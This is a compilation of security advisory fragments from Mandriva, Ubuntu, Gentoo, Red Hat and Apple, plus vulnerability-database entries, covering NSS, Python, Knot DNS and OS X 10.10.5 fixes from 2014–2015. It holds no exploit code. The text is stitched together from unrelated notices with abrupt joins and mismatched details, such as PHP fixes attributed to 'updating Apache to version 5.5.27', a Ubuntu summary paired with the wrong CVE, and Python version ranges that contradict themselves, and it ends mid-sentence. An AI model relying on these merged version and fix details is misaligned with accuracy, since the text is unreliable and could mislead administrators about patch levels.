https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.4_release_notes
https://www.mozilla.org/en-US/security/advisories/mfsa2014-55/
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
============================================================================
Ubuntu Security Notice USN-2360-1
September 24, 2014
firefox vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Fraudulent security certificates could allow sensitive information to
be exposed when accessing the Internet.
Software Description:
- firefox: Mozilla Open Source web browser
Details:
Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled
parsing ASN.1 values.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
firefox 32.0.3+build1-0ubuntu0.14.04.1
Ubuntu 12.04 LTS:
firefox 32.0.3+build1-0ubuntu0.12.04.1
After a standard system update you need to restart Firefox to make
all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-2360-1
CVE-2014-1568
Package Information:
https://launchpad.net/ubuntu/+source/firefox/32.0.3+build1-0ubuntu0.14.04.1
https://launchpad.net/ubuntu/+source/firefox/32.0.3+build1-0ubuntu0.12.04.1
For the testing distribution (jessie) and unstable distribution (sid),
Iceweasel uses the system NSS library, handled in DSA 3033-1
| VAR-201803-0062 | CVE-2014-0486 | Knot DNS Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Knot DNS before 1.5.2 allows remote attackers to cause a denial of service (application crash) via a crafted DNS message. Knot DNS contains an input validation vulnerability that may leave the service in a denial-of-service (DoS) state. Knot DNS is a DNS server. Knot DNS is prone to an unspecified denial-of-service vulnerability.
Remote attackers can exploit this issue to cause denial-of-service conditions for legitimate users
| VAR-201410-1319 | CVE-2014-7185 | Python bufferobject.c integer overflow vulnerability |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function. Python is prone to an integer-overflow vulnerability because it fails to properly bounds check user-supplied input before copying it into an insufficiently sized buffer.
Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition.
Versions prior to Python 2.7.8 are vulnerable. The language is scalable, supports modules and packages, and supports multiple platforms. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Python 3.3 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-3.3.5-r1"
All Python 2.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.7.9-r1"
References
==========
[ 1 ] CVE-2013-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1752
[ 2 ] CVE-2013-7338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-7338
[ 3 ] CVE-2014-1912
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1912
[ 4 ] CVE-2014-2667
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2667
[ 5 ] CVE-2014-4616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4616
[ 6 ] CVE-2014-7185
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7185
[ 7 ] CVE-2014-9365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9365
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
============================================================================
Ubuntu Security Notice USN-2653-1
June 25, 2015
python2.7, python3.2, python3.4 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in Python. A malicious ftp, http,
imap, nntp, pop or smtp server could use this issue to cause a denial of
service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.
(CVE-2014-7185)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
python2.7 2.7.8-10ubuntu1.1
python2.7-minimal 2.7.8-10ubuntu1.1
python3.4 3.4.2-1ubuntu0.1
python3.4-minimal 3.4.2-1ubuntu0.1
Ubuntu 14.04 LTS:
python2.7 2.7.6-8ubuntu0.2
python2.7-minimal 2.7.6-8ubuntu0.2
python3.4 3.4.0-2ubuntu1.1
python3.4-minimal 3.4.0-2ubuntu1.1
Ubuntu 12.04 LTS:
python2.7 2.7.3-0ubuntu3.8
python2.7-minimal 2.7.3-0ubuntu3.8
python3.2 3.2.3-0ubuntu3.7
python3.2-minimal 3.2.3-0ubuntu3.7
In general, a standard system update will make all the necessary changes.
The python27 collection provides a stable release of
Python 2.7 with a number of additional utilities and database connectors
for MySQL and PostgreSQL.
The python27-python packages have been upgraded to upstream version 2.7.8,
which provides numerous bug fixes over the previous version. (BZ#1167912)
The following security issues were fixed in the python27-python component:
It was discovered that the socket.recvfrom_into() function failed to check
the size of the supplied buffer. (CVE-2014-4616)
In addition, this update adds the following enhancement:
* The python27 Software Collection now includes the python-wheel and
python-pip modules. All running python27
instances must be restarted for this update to take effect.
APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update
2015-006
OS X Yosemite v10.10.5 and Security Update 2015-006 is now available
and addresses the following:
apache
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Apache 2.4.16, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in Apache versions
prior to 2.4.16. These were addressed by updating Apache to version
2.4.16.
CVE-ID
CVE-2014-3581
CVE-2014-3583
CVE-2014-8109
CVE-2015-0228
CVE-2015-0253
CVE-2015-3183
CVE-2015-3185
apache_mod_php
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in PHP 5.5.20, the most
serious of which may lead to arbitrary code execution. These were addressed by updating Apache to version 5.5.27.
CVE-ID
CVE-2015-2783
CVE-2015-2787
CVE-2015-3307
CVE-2015-3329
CVE-2015-3330
CVE-2015-4021
CVE-2015-4022
CVE-2015-4024
CVE-2015-4025
CVE-2015-4026
CVE-2015-4147
CVE-2015-4148
Apple ID OD Plug-in
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able change the password of a
local user
Description: In some circumstances, a state management issue existed
in password authentication. The issue was addressed through improved
state management.
CVE-ID
CVE-2015-3799 : an anonymous researcher working with HP's Zero Day
Initiative
AppleGraphicsControl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in AppleGraphicsControl which could
have led to the disclosure of kernel memory layout. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2015-5768 : JieTao Yang of KeenTeam
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in
IOBluetoothHCIController. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3779 : Teddy Reed of Facebook Security
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory management issue could have led to the
disclosure of kernel memory layout. This issue was addressed with
improved memory management.
CVE-ID
CVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze
Networks
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious app may be able to access notifications from
other iCloud devices
Description: An issue existed where a malicious app could access a
Bluetooth-paired Mac or iOS device's Notification Center
notifications via the Apple Notification Center Service. The issue
affected devices using Handoff and logged into the same iCloud
account. This issue was resolved by revoking access to the Apple
Notification Center Service.
CVE-ID
CVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security
Lab (Indiana University), Tongxin Li (Peking University), XiaoFeng
Wang (Indiana University)
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with privileged network position may be able to
perform denial of service attack using malformed Bluetooth packets
Description: An input validation issue existed in parsing of
Bluetooth ACL packets. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-3787 : Trend Micro
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: Multiple buffer overflow issues existed in blued's
handling of XPC messages. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2015-3777 : mitp0sh of [PDX]
bootp
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may have
broadcast MAC addresses of previously accessed networks via the DNAv4
protocol. This issue was addressed through disabling DNAv4 on
unencrypted Wi-Fi networks.
CVE-ID
CVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,
University of Oxford (on the EPSRC Being There project)
CloudKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access the iCloud
user record of a previously signed in user
Description: A state inconsistency existed in CloudKit when signing
out users. This issue was addressed through improved state handling.
CVE-ID
CVE-2015-3782 : Deepkanwal Plaha of University of Toronto
CoreMedia Playback
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in CoreMedia Playback.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-5777 : Apple
CVE-2015-5778 : Apple
CoreText
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team
curl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities in cURL and libcurl prior to
7.38.0, one of which may allow remote attackers to bypass the Same
Origin Policy.
Description: Multiple vulnerabilities existed in cURL and libcurl
prior to 7.38.0. These issues were addressed by updating cURL to
version 7.43.0.
CVE-ID
CVE-2014-3613
CVE-2014-3620
CVE-2014-3707
CVE-2014-8150
CVE-2014-8151
CVE-2015-3143
CVE-2015-3144
CVE-2015-3145
CVE-2015-3148
CVE-2015-3153
Data Detectors Engine
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a sequence of unicode characters can lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in processing of
Unicode characters. These issues were addressed through improved
memory handling.
CVE-ID
CVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)
Date & Time pref pane
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Applications that rely on system time may have unexpected
behavior
Description: An authorization issue existed when modifying the
system date and time preferences. This issue was addressed with
additional authorization checks.
CVE-ID
CVE-2015-3757 : Mark S C Smith
Dictionary Application
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with a privileged network position may be able
to intercept users' Dictionary app queries
Description: An issue existed in the Dictionary app, which did not
properly secure user communications. This issue was addressed by
moving Dictionary queries to HTTPS.
CVE-ID
CVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security
Team
DiskImages
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team
dyld
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-3760 : beist of grayhash, Stefan Esser
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-3804 : Apple
CVE-2015-5775 : Apple
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team
groff
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple issues in pdfroff
Description: Multiple issues existed in pdfroff, the most serious of
which may allow arbitrary filesystem modification. These issues were
addressed by removing pdfroff.
CVE-ID
CVE-2009-5044
CVE-2009-5078
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
TIFF images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5758 : Apple
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Visiting a maliciously crafted website may result in the
disclosure of process memory
Description: An uninitialized memory access issue existed in
ImageIO's handling of PNG and TIFF images. Visiting a malicious
website may result in sending data from process memory to the
website. This issue is addressed through improved memory
initialization and additional validation of PNG and TIFF images.
CVE-ID
CVE-2015-5781 : Michal Zalewski
CVE-2015-5782 : Michal Zalewski
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An issue existed in how Install.framework's 'runner'
binary dropped privileges. This issue was addressed through improved
privilege management.
CVE-ID
CVE-2015-5784 : Ian Beer of Google Project Zero
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A race condition existed in
Install.framework's 'runner' binary that resulted in
privileges being incorrectly dropped. This issue was addressed
through improved object locking.
CVE-ID
CVE-2015-5754 : Ian Beer of Google Project Zero
IOFireWireFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Memory corruption issues existed in IOFireWireFamily.
These issues were addressed through additional type input validation.
CVE-ID
CVE-2015-3769 : Ilja van Sprundel
CVE-2015-3771 : Ilja van Sprundel
CVE-2015-3772 : Ilja van Sprundel
IOGraphics
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in IOGraphics. This
issue was addressed through additional type input validation.
CVE-ID
CVE-2015-3770 : Ilja van Sprundel
CVE-2015-5783 : Ilja van Sprundel
IOHIDFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A buffer overflow issue existed in IOHIDFamily. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5774 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in the mach_port_space_info interface,
which could have led to the disclosure of kernel memory layout. This
was addressed by disabling the mach_port_space_info interface.
CVE-ID
CVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,
@PanguTeam
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2015-3768 : Ilja van Sprundel
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A resource exhaustion issue existed in the fasttrap
driver. This was addressed through improved memory handling.
CVE-ID
CVE-2015-5747 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A validation issue existed in the mounting of HFS
volumes. This was addressed by adding additional checks.
CVE-ID
CVE-2015-5748 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute unsigned code
Description: An issue existed that allowed unsigned code to be
appended to signed code in a specially crafted executable file. This
issue was addressed through improved code signature validation.
CVE-ID
CVE-2015-3806 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A specially crafted executable file could allow unsigned,
malicious code to execute
Description: An issue existed in the way multi-architecture
executable files were evaluated that could have allowed unsigned code
to be executed. This issue was addressed through improved validation
of executable files.
CVE-ID
CVE-2015-3803 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute unsigned code
Description: A validation issue existed in the handling of Mach-O
files. This was addressed by adding additional checks.
CVE-ID
CVE-2015-3802 : TaiG Jailbreak Team
CVE-2015-3805 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted plist may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption existed in processing of malformed
plists. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein
(@jollyjinx) of Jinx Germany
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed. This was addressed
through improved environment sanitization.
CVE-ID
CVE-2015-3761 : Apple
Libc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted regular expression may lead
to an unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in the TRE library.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-3796 : Ian Beer of Google Project Zero
CVE-2015-3797 : Ian Beer of Google Project Zero
CVE-2015-3798 : Ian Beer of Google Project Zero
Libinfo
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: Memory corruption issues existed in handling AF_INET6
sockets. These were addressed by improved memory handling.
CVE-ID
CVE-2015-5776 : Apple
libpthread
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling syscalls.
This issue was addressed through improved lock state checking.
CVE-ID
CVE-2015-5757 : Lufeng Li of Qihoo 360
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in libxml2 versions prior
to 2.9.2, the most serious of which may allow a remote attacker to
cause a denial of service
Description: Multiple vulnerabilities existed in libxml2 versions
prior to 2.9.2. These were addressed by updating libxml2 to version
2.9.2.
CVE-ID
CVE-2012-6685 : Felix Groebert of Google
CVE-2014-0191 : Felix Groebert of Google
libxml2
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory access issue existed in libxml2. This was
addressed by improved memory handling.
CVE-ID
CVE-2014-3660 : Felix Groebert of Google
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory corruption issue existed in parsing of XML
files. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3807 : Apple
libxpc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling of
malformed XPC messages. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2015-3795 : Mathew Rowley
mail_cmds
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary shell commands
Description: A validation issue existed in the mailx parsing of
email addresses. This was addressed by improved sanitization.
CVE-ID
CVE-2014-7844
Notification Center OSX
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access all
notifications previously displayed to users
Description: An issue existed in Notification Center, which did not
properly delete user notifications. This issue was addressed by
correctly deleting notifications dismissed by users.
CVE-ID
CVE-2015-3764 : Jonathan Zdziarski
ntfs
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in NTFS. This issue
was addressed through improved memory handling.
CVE-ID
CVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze
Networks
OpenSSH
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Remote attackers may be able to circumvent a time delay for
failed login attempts and conduct brute-force attacks
Description: An issue existed when processing keyboard-interactive
devices. This issue was addressed through improved authentication
request validation.
CVE-ID
CVE-2015-5600
OpenSSL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in OpenSSL versions prior
to 0.9.8zg, the most serious of which may allow a remote attacker to
cause a denial of service.
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
perl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted regular expression may lead to
an unexpected application termination or arbitrary code execution
Description: An integer underflow issue existed in the way Perl
parsed regular expressions. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2013-7422
PostgreSQL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: An attacker may be able to cause unexpected application
termination or gain access to data without proper authentication
Description: Multiple issues existed in PostgreSQL 9.2.4. These
issues were addressed by updating PostgreSQL to 9.2.13.
CVE-ID
CVE-2014-0067
CVE-2014-8161
CVE-2015-0241
CVE-2015-0242
CVE-2015-0243
CVE-2015-0244
python
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Python 2.7.6, the most
serious of which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in Python versions
prior to 2.7.6.
CVE-ID
CVE-2013-7040
CVE-2013-7338
CVE-2014-1912
CVE-2014-7185
CVE-2014-9365
QL Office
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted Office document may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of Office
documents. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5773 : Apple
QL Office
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML file may lead to
disclosure of user information
Description: An external entity reference issue existed in XML file
parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.
Quartz Composer Framework
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted QuickTime file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of
QuickTime files. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5771 : Apple
Quick Look
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Searching for a previously viewed website may launch the web
browser and render that website
Description: An issue existed where QuickLook had the capability to
execute JavaScript. The issue was addressed by disallowing execution
of JavaScript.
CVE-ID
CVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3772
CVE-2015-3779
CVE-2015-5753 : Apple
CVE-2015-5779 : Apple
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3765 : Joe Burnett of Audio Poison
CVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-5751 : WalkerFuz
SceneKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted Collada file may lead to
arbitrary code execution
Description: A heap buffer overflow existed in SceneKit's handling
of Collada files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5772 : Apple
SceneKit
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in SceneKit. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3783 : Haris Andrianakis of Google Security Team
Security
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A standard user may be able to gain access to admin
privileges without proper authentication
Description: An issue existed in handling of user authentication.
This issue was addressed through improved authentication checks.
CVE-ID
CVE-2015-3775 : [Eldon Ahrold]
SMBClient
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in the SMB client.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3773 : Ilja van Sprundel
Speech UI
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted unicode string with speech
alerts enabled may lead to an unexpected application termination or
arbitrary code execution
Description: A memory corruption issue existed in handling of
Unicode strings. This issue was addressed by improved memory
handling.
CVE-ID
CVE-2015-3794 : Adam Greenbaum of Refinitive
sudo
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in sudo versions prior to
1.7.10p9, the most serious of which may allow an attacker access to
arbitrary files
Description: Multiple vulnerabilities existed in sudo versions prior
to 1.7.10p9. These were addressed by updating sudo to version
1.7.10p9.
CVE-ID
CVE-2013-1775
CVE-2013-1776
CVE-2013-2776
CVE-2013-2777
CVE-2014-0106
CVE-2014-9680
tcpdump
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in tcpdump versions
prior to 4.7.3. These were addressed by updating tcpdump to version
4.7.3.
CVE-ID
CVE-2014-8767
CVE-2014-8769
CVE-2014-9140
Text Formats
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted text file may lead to
disclosure of user information
Description: An XML external entity reference issue existed with
TextEdit parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team
udf
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3767 : beist of grayhash
OS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:
https://support.apple.com/en-us/HT205033
OS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained
from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
Space precludes documenting all of these changes in this advisory. This could be used
to crash a Python application that uses the socket.recvfrom_into()
function or, possibly, execute arbitrary code with the permissions
of the user running vulnerable Python code (CVE-2014-1912).
This updates the python package to version 2.7.6, which fixes several
other bugs, including denial of service flaws due to unbound readline()
calls in the ftplib and nntplib modules (CVE-2013-1752).
Denial of service flaws due to unbound readline() calls in the imaplib,
poplib, and smtplib modules (CVE-2013-1752).
A gzip bomb and unbound read denial of service flaw in the Python XMLRPC
library (CVE-2013-1753).
Python is susceptible to arbitrary process memory reading by a user
or adversary due to a bug in the _json module caused by insufficient
bounds checking. The bug is caused by allowing the user to supply a
